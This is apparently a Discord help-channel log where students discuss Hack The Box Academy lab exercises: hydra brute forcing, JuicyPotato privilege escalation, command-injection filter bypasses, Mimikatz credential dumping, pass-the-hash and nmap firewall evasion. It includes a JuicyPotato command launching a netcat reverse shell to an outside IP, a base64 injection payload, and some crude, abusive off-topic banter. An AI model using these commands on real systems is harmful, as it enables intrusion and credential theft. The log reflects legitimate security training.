any hints? I think hydra takes already to long for an module question. But it states create the mutated wordlist from the files in the ZIP. I took the rules and the pw-list from the Zip. Not much more combinations left. Maybe I overlook something. Ty!
try without sorting the file ... as that might place the intended pass somewhere at the bottom
try ftp or smb, not ssh, also use -t 48 to bruteforce faster
||tail -n +17001 your_mut_passwd_list >> modifiedfile.list( little hint to crack faster)||
thanks for your help already. I have msf running in parallel for smb but so far still running without any findings
made a new file without sort now, lets see
I will check for your hints also, ty ty
yeah worked, thanks! This one needs some patience. I'm a little afraid of the exam now. In the end losing too much time because something doesn't fit with the list while bruteforcing. Better watch twice here, or try multiple lists in parallel. Thanks again!
I really enjoyed this module:
Automating tedious or otherwise impossible tasks is highly valued during both penetration testing engagements and everyday life. Introduction to Python 3 aims to introduce the student to the world of scripting with Python 3 and covers the essential building blocks needed for a beginner to understand programming. Some advanced topics are also cov...
it is done
SO ! I finally got this file, I understood after your help that I just had to change the ||FILEPATH|| parameter, yet I wasted another 30 minutes trying to predict where the flag was in the architecture by trying various /simple-backup/ combinations as I thought that the text on the site was a clue to find the flag, despite its path being given in the htb question in the first place. I never felt so relieved / happy and mad to myself at the same time before ahahah, thanks for the help anyway I might have to learn how to not overcomplicate everything ^^ thanks for your help too @acoustic owl
hi, sorry i just started my cyber journey. how did you know we are only supposed to scan 53 
The module heavily hints it
It's also highly different depending on the academy module
Hi, I have question for the Windows Privilege Escalation Skill assessment module, I got a rev shell and currently working for privesc, I have tried to use printspoofer, roguepotato, and juicy potato, none of it worked. Finally I discover to use CLSID which giving me this output:
PS C:\windows\temp> ./juicypotato.exe -t * -l 1337 -p "C:\windows\temp\nc.exe 10.10.14.206 1236 -e powershell" -c "{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}"
./juicypotato.exe -t * -l 1337 -p "C:\windows\temp\nc.exe 10.10.14.206 1236 -e powershell" -c "{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}"
Testing {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} 1337
......
[+] authresult 0
{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8};NT AUTHORITY\SYSTEM
[-] CreateProcessWithTokenW Failed to create proc: 2
[-] CreateProcessAsUser Failed to create proc: 2
[+] calling 0x000000000088ce08
Did I miss something? I haven't got any information on google regarding the create proc:2
How many CLSIDs did you try? You can't just pick one and go with it
I tried using the test_clsid.bat which give me the list of clsid that have NT AUTHORITY\SYSTEM, but none of it worked so far
Am I on the right track? or there's something that I missed?
did you choose the CLSIDs from the correct operating system?
Yes, I already choose the CLSIDs from the systeminfo output, where I get the list of CLSID from the github tools page, but still I didn't get any reverse shell, it end up showing "Failed to create proc: 2" message
Is the problem because I using netcat shell not the RDP?
Try to create a shell with Meterpreter and call this shell (yourfile.exe)
Glad to read it
Ok, I got CreateProcessWithTokenW OK, but it I didn't get the shell to my multi/handler metasploit
Module:Password Attacks
Section:Pass the Hash (PtH)
tried cme smb -sam to dump hashes, but there is no david, also tried with mimikatz and also there is no hash for david user, could someone help me pls?
which command did you use with Mimikatz?
||lsadump::lsa /patch, also used lsadump:sam /system:C:\system /sam:C:\sam||
Yeah there's more to Mimikatz than lsadump, try other commands taught in the module
ok i will check, thank you
well i reread all module, and there is no other things, well i tried also to dump ndst but there is nothing, here check it, (at screenshot u can see david thing but this hash is not working)
Hello, guys i am new here I am having trouble in Command Injection Module in the Skills Assessment part you see I am getting the error Error while moving: mv: ‘/var/www/html/files/2561732172.txt’ and ‘/var/www/html/files/2561732172.txt’ are the same file. I am creating the base64 encoded version
echo -n 'cat ${PATH:0:1}flag.txt' | base64
this is the whole thing
`?to=&bash<<<$(base64 (%09) -d<<<Y2F0IC9mbGFnLnR4dA==)&from=2561732172.txt&finish=1&move=1` where am I making a mistake
sekurlsa::logonpasswords
oh i didnt know this thing, im gonna check it
the command is not in the section but a lot of commands are not even in the path, you are supposed to investigate stuff
sometimes errors can show commands output like cat
I know but it is not showing it
try harder
Huh, you're right, seems it wasn't there
But research is expected regardless
?
you are in the right track just try more stuff
yee moral support
1st try to find the injection point, the site answer you with Malicious request detected
this means you are getting something blacklisted
try to bypass it
injection point is bypassed
i should be getting the malicious request denied if i had
a problem with that
Your screenshots contain some spoilers and can be seen as a spoiler
oh sorry i will delete it
ye
I'm stuck on the Last question of Active Directory Enumeration and Attack, I can't seem to perform the DCSync with the creds for t***. I have tried to do this from MS01 with secretsdump.exe.
Can anyone assist me?
i have done that 100 times xd
dm me your payload
nvm I figured something out
Wsg y'all. I am at Vuln Assessment the Nexus Skill thingy.
I do the scan, for some reason it takes seconds. I configure the target and the authentication , but when I download the report it's all blank. I did a scan after I SSHed to the generated 10.129 - target. The target on nessus was 172.16.16.100.
What am I doing wrong?
What's the idea of the spawned target system if I am already given an IP. I just don't get the logic.
Wait bruh, follow me through. I get into the target with SSH, run the nessus start command on the enemy target , from where I log into nessus with the given credentials, which I enter afterwards in the configuration?
you dont have to run any scan
read thoroughly the content of the section
the spawned ip has running the nessus dashboard
wait for it a couple of minutes to set up
its running under https in the port taught in the module
ssh connection isn't necessary either
You connect to the Nessus port on the spawned target via https
Will do, fellas.
use crackmapexec and instead of -p use -H
anybody available to talk about the way they solved LINUX PRIVILEGE ESCALATION > Escaping Restricted Shells > Use different approaches to escape the restricted shell and read the flag.txt file ?
I solved it using|| ssh xxxx -t "sh" ||and wonder how other did it ?
Is it okay to use mutated password list in Password Attacks Skills Assessments? i dont need rockyou.txt right?
As soon as you create the list, it's used throughout the entire module
If something doesn't crack with it, only then you switch to rockyou
Hello guys
can someone help me with the last lab of the nmap module? (the Hard one)
Source port
yup i alredy use --source-port 53
Are you doing a full port scan
-p- yes sir
Udp?
-sU yes sir
Have you tried tcp?
-sA and -sT too
Weird but if you mostly follow the ids/ips evasion section under proxying it'll be more helpful
Oh right it's the Syn scan
-sS?
but this one is the default with root account
I'm confused about the question in it's self because it's seems to me that they are talking about the Dns
maybe -sT with source-port 53
after that listen with nc -nv(found a strange port or anything like this)
and just wait for banner, it may take 1 minute
humm..
also u can try -Pn and -n
i'm stuck at this lol
just as i said, he must use nc -nv <ip> <port> after nmap scan, to grab a banner
How do we add the registry key that would enabled 'Windows Admin mode' if we don't have access to the windows machine.
I now see that Impacket is also a solution
can you explain why only that "port" work?
53?
the firewall accepts inbound connections if they come from port 53 for DNS resolution
it's explained in the section
guys im trying to download a file with smbclient but file is too big, how to download it with crackmapexec or when mounting a drive to /mnt how to specify user?
Ok I got it
with smbclient how
it prints an error
I'm telling you how to find it, DNS is only related due to --source-port
Use remmina, it works better
unrelated to the question
They can't access the box to change the things they need in the registry because of xfreerdp, so it's definitely related if you use remmina to access the box
Okay, good morning everyone. I am stuck on the Skills assesment of INTRODUCTION TO THREAT HUNTING & HUNTING WITH ELASTIC. I have been reading web pages all morning and trying my best to build this KQL query to search for "Lateral Tool Transfer". Here is my Query:||(event.category: "command" OR event.category: "file" OR event.category: "named pipe" OR event.category: "network" OR event.category: "process") AND
(event.action: "execution" OR event.action: "creation" OR event.action: "modification" OR event.action: "connection" OR event.action: "access" OR event.action: "start") AND
user.name: "r*"||
you wont have access with Remmina either
Yes they will
to allow PtH you need the registry key
Lmao ok
Use win-rm
It literally explains in the section that you need to use a command using evil-winrm
well maybe it bcs of my kali machine, gonna try it with pwnbox
Good Morning im having issues-WINDOWS PRIVILEGE ESCALATION-DNSAdmins can anyone give me a nudge
Read the Question again
Create a KQL query to hunt for "Lateral Tool Transfer" to C:\Users\Public.
you can try the mount method as you said !
you can specify the username and password with -o
remember installing cifs-utils
Yes
to crack it o.O
This is slightly more recent #modules message
I'm helping the process to mount it :p
personally used Windows, full compatibility with vhd files
Honestly the second link works really well
¯\_(ツ)_/¯
I was able to follow the article step-by-step and made it work first try
Well yeah
AD and windows makes sense
¯\_(ツ)_/¯
i love when he completes machines from his Windows host
Cool (don't know and don't care)
you have to know xct come on
I really don't
best HTB player ever i think
CEO of vulnlab
truly difficult CTF machines platform
i recommend it a lot, but you need some experience
Szymex was the best HTB player afaik
i have never seen another top 1
This is straying off topic
Szymex doesn't do boxes anymore
Shoo noob
I will fuck your dad

git gud all
there's good, and then there's szymex and xct, all of academy won't bring us to that level lol
I'm fine with my two braincells, I just want the skills to get a job, not CTF fame
"Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account? "
I don't understand why they would want me to use the mimikatz tool to find David's RC4 hash when the use of this tool requires that you know an NTLM or RC4 hash of the user in order to run this tool
you do not
It requires you to know the creds of a different user
So I can use the credentials of the user Administrator
Thats what it explicitly tells you
As the credentials are directly above the question
Note its a hash, not a password
Oh I thought that was just to RDP into the target machine.
Nevermind, I think I figured it out
Hey all, i've been stuck in the assessment for Windows Event logs & Finding Evil..
Specifically for: * By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.exe*
Just want to know if anyone has any tips without giving away too much.. i've hit a wall at the moment
Need to dm someone regarding Unconstrained Delegation - Computers in the Kerberos Attacks (module/25/section/142) as saying anything here will be a spoiler
Just put in spoiler tags so no one sees? Enclose in ||
think about what happens when PowerShell code is executed.
Now that I am on the C:\Windows\system32 machine do I need to execute another pass the hash command or would one do just fine?
I asked because I tried finding the \DC01\david.txt directory with no luck
"Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt. "
Good Afternoon the following commands do not appear to be working in **Windows Priv DNS admin ** Am i missing something ?
Trying to figure out how to convert a decimal into RID which is hex.
Tried using magic chef but the value doesn't look right. Any suggestions?
Thank You, and Thanks to Rafa as well, I found it. I thought that i would have to do the scan, not that it is done 4 me X-X
question about reporting and CVSS, do you score the same an SQL that only allows data exfiltration vs one that would let you upload a web shell and perform RCE via that web shell?
It depends on the type of data exfil and how many potential systems the victim has further access to
The deported device which measures into a false line, sudden with projectores, the sudden swipe of DNS and controllers needs to be at a vibe of 0 Device Project X measure.
The fuck does this mean
The hash files has no stages where it uplifts a curve of doing nothing to it, it seizes the lap of the running module like a feather.
Windows will tell you if it can't perform a thing/need more privs
The fuck are you even saying
those are... words
bro speaks in pseudo-Shakespeare
This man's autocorrect is working overtime^^^
help me understand something that wasn't clear in the Kerberos Attack- Unconstrained Delegation - Computers section ... I have received the TGT for DC01$ through SpoolSample and renewed the ticket to load it on the memory... do I still need a domain admin to access the directory in \DC01\C$?
Thank you blessed mods
Yes because it's a domain share
You can probably use the DC01$ ticket though
Sir, who blessed you with the finest longleaf to puff on?
Either this mans is on another planet, or his vocabulary is beyond our comprehension^^
In both cases, he is too advanced for us.
He's probably on a level where he has all 3 HTB certs
He is alt acc of an admin.
how can I fuzz for html files with Burp Suite Intruder? I used suffix ".html" in payload processing, but had no match.
Burp free?
"using web proxies" "burp intruder"
Is there even a module that will teach us BurpSuite?
it is showing only, how to get a match for ip:port /admin , but for the flag I need a html file.
thanks
from the footprinting lab how did you guys manage to enumerate the snmp cuz its refusing
could you share some screenshots?
hi all .. I've started the ACTIVE DIRECTORY ENUMERATION & ATTACKS module and in the first question i'm stuck:
While looking at inlanefreights public records; A flag can be seen. Find the flag and submit it. ( format == HTB{******} )
I can't find this flag at all looking at the public DNS records for inlanefreights.com. Any tips ?
it is on records
maybe you mistyped something?
lol nevermind .. it worked now .. but i'm on the academy VPN
is that a requirement ?
probably something weird with my internet or something
probably because you wrote inlanefreightS.com as here
doing a dig in any records wasn't giving anything
you're right .. i copied from the question and got it wrong
"While looking at inlanefreights public records;"
feel like a tool now
ight let me repeat the enumeration and ill send some
i just need a way to use dictionary to find the community string
onesixtyone is the tool referenced to grab the community string iirc
yeah but the thing is the wordlist cuz the defaults ain't working and tried to find one on github and they do not work too
The default wordlist or one in SecList does work share a screenshot of your output and I can almost guarantee you overlooked the output
ahh ok found it
Ya looked over it didn't ya
yeah
Module AD Enum & Attacks:
It states VPN access into their internal network (a bit limiting because we will not be able to perform certain attacks such as LLMNR/NBT-NS Poisoning).
But one day in #hacker-lounge someone claimed it was possible. What is the consensus about it?
hello guys, someone can help me with Bleeding Edge Vulnerabilities?? Active Directory Enumeration & Attacks module
this error appears
it is possible when it has to be))
Should probably blur out the user's password
Also are you sure that cve is written for python3? (Haven't finished this module so I'm not sure)
ok i monitored for other users using rubeus and only got two domain users and when i load their TGT through asking for one using NT hash I am unable to access the domain directory ... i m not getting a domain admin user in the monitor. Not sure where I am messing up.
I honestly haven't done this module, this is the Kerberos module yeah?
yep in tier 3
Yes, here in the module it is like this, I used it as a base
Follow the error and what it fully says
you sure that you need this CVE?
also, did you install cube0x0's impacket?
it's required to make this CVE iirc
@hallow kiln mate if you're available, I would like to dm you regarding kerberos attacks
is this an erratum?
there is another commonName in the result ... i remember falling for this trap
let me grep real quick xD
ah yea in 3389 o.O
2 different certificates
one from the CA
and the RDP one
makes sense
yea i never understood that and shoved it under things HTB didnt explain
what is the commonName for the RDP certificate could be a better question
but you cannot induce anxiety with that way of questioning
wdym
as in asking unclear questions is the only way to torture us
anime Leader ki
This actually helped heaps. Just got the answer, cheers! @acoustic owl
go to the "/opt/" (pwnbox) directory there are some exploits you can use against the DC
You can DM me, don't know how helpful I can be, I haven't done the module
how to solve this problem in Attacking Web Applications With FFUF "Try running a sub-domain fuzzing test on 'inlanefreight.com' to find a customer sub-domain portal. What is the full domain of it?" i tried `ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.inlanefreight.com/` but ffuf kept sending errors
please if you can help i would be so thankful
i also tried to add the website ip to /etc/hosts but it also didnt work
and pinging the website just results in 100% packet loss
tried with http but it didnt work
yeah
i did with pwnbox and my vm
what is pm